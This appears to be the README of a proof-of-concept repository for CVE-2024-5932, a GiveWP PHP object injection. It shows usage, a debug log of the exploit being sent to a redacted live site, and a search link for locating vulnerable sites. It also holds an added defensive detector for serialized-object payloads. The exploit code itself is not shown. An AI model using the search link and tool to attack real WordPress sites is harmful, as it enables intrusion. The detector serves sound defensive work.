Description
Proof-of-Concept for CVE-2024-5932 GiveWP PHP Object Injection
Readme
# CVE-2024-5932-PoC
Proof-of-Concept for CVE-2024-5932 GiveWP PHP Object Injection
# ⚠️⚠️Kinda works but doesn't. Need Help⚠️⚠️
# Usage
```sh
python3 exploit.py
```
The script prompts for the target domain and the full URL of the donation form.
```sh
┌──(root💀)-[~/CVE-2024-5932-PoC]
└─# python3 exploit.py
Enter the target domain (e.g., example.com):
Please enter the full donation form URL (e.g., https://example.com/donations/donation-form):
```
# Output
```sh
┌──(root💀)-[~/CVE-2024-5932-PoC]
└─# python3 exploit.py
Please enter the domain (e.g., example.com): xxxxxxxx.org
Please enter the full donation form URL (e.g., https://example.com/donations/donation-form): https://xxxxxxxx.org/donations/donation-form/
2024-08-22 15:16:52,154 - DEBUG - Attempting to access: https://xxxxxxxx.org/donations/donation-form/
2024-08-22 15:16:52,156 - DEBUG - Starting new HTTPS connection (1): xxxxxxxx.org:443
2024-08-22 15:16:52,580 - DEBUG - https://xxxxxxxx.org:443 "GET /donations/donation-form/ HTTP/1.1" 200 17518
2024-08-22 15:16:52,709 - DEBUG - Received response with status code: 200
2024-08-22 15:16:52,721 - DEBUG - Searching for donation form in the page HTML...
2024-08-22 15:16:52,722 - DEBUG - Donation form found.
2024-08-22 15:16:52,723 - DEBUG - Payload prepared successfully.
2024-08-22 15:16:52,723 - INFO - Sending exploit to https://xxxxxxxx.org/wp-admin/admin-ajax.php...
2024-08-22 15:16:52,723 - DEBUG - Preparing payload...
2024-08-22 15:16:52,724 - DEBUG - Starting new HTTPS connection (1): xxxxxxxx.org:443
2024-08-22 15:16:54,462 - DEBUG - https://xxxxxxxx.org:443 "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 None
2024-08-22 15:16:54,462 - DEBUG - Exploit response status code: 200
2024-08-22 15:16:54,462 - INFO - Exploit sent successfully!
```
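The output above shows the PoC fetching the donation form and then sending a POST to `/wp-admin/admin-ajax.php`. For defenders, the following added example (not part of this repository) flags form fields sent to that endpoint whose value, after decoding, carries a PHP serialized-object token. The field names, the class name `Example` and the sample request bodies are constructed placeholders.

```python
import re
from urllib.parse import parse_qsl, unquote_plus

AJAX_PATH = "/wp-admin/admin-ajax.php"  # endpoint seen in the PoC output
# PHP serialize() object token: O:<len>:"<Class>":<count>:{  (C: for custom-serialized classes)
OBJ_TOKEN = re.compile(r'(?:^|[;{])[OC]:\+?\d+:"([^"]{1,255})":\d+:\{')

def normalise(value, max_rounds=3):
    """Undo extra URL-encoding layers and backslash escaping before matching."""
    for _ in range(max_rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value.replace("\\", "").strip()

def suspicious_fields(method, path, body):
    """Return [(field, class_name)] for POSTed form fields holding a serialized PHP object."""
    if method.upper() != "POST" or not path.split("?")[0].endswith(AJAX_PATH):
        return []
    hits = []
    for field, value in parse_qsl(body, keep_blank_values=True):
        match = OBJ_TOKEN.search(normalise(value))
        if match:
            hits.append((field, match.group(1)))
    return hits

# Constructed sample requests: (method, path, form-encoded body).
SAMPLES = [
    ("POST", AJAX_PATH, "action=example_action&note=hello&amount=25"),
    ("POST", AJAX_PATH, "action=example_action&note=O%3A7%3A%22Example%22%3A0%3A%7B%7D"),
    # Same value, URL-encoded twice and with backslash-escaped quotes.
    ("POST", AJAX_PATH,
     "action=example_action&note=O%253A7%253A%255C%2522Example%255C%2522%253A0%253A%257B%257D"),
    ("GET", "/donations/donation-form/", ""),
]

def scan(samples=SAMPLES):
    """Run the check over every sample and return the hit list per request."""
    return [suspicious_fields(*sample) for sample in samples]

if __name__ == "__main__":
    for sample, hits in zip(SAMPLES, scan()):
        print(sample[0], sample[1], "->", hits or "clean")
```

Web server access logs usually omit POST bodies, so this check belongs where the request body is visible, such as a WAF rule, a reverse proxy, or an application-level request logger.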
# Hunter Search
https://hunter.how/list?searchValue=web.body%3D%22%2Fwp-content%2Fplugins%2Fgive%22
# DISCLAIMER:
This script is provided for educational and research purposes only. The intent of this tool is to help security researchers and penetration testers identify vulnerabilities in systems that they have explicit permission to test. Unauthorized access to computer systems is illegal and unethical.
By using this script, you agree to take full responsibility for any actions performed with it. The author and contributors to this script are not responsible for any damages or legal consequences that may arise from its use. Ensure that you have proper authorization before testing any systems with this tool.
Use this tool responsibly and only on systems for which you have explicit permission to perform security testing.
If you are unsure about the legality of your actions, consult with a legal professional before proceeding.
File Snapshot
[4.0K] /data/pocs/3904fe821d9bc5f0b0801dc686af356fe03f2d0d
├── [4.2K] exploit.py
├── [1.0K] LICENSE
└── [2.7K] README.md
0 directories, 3 files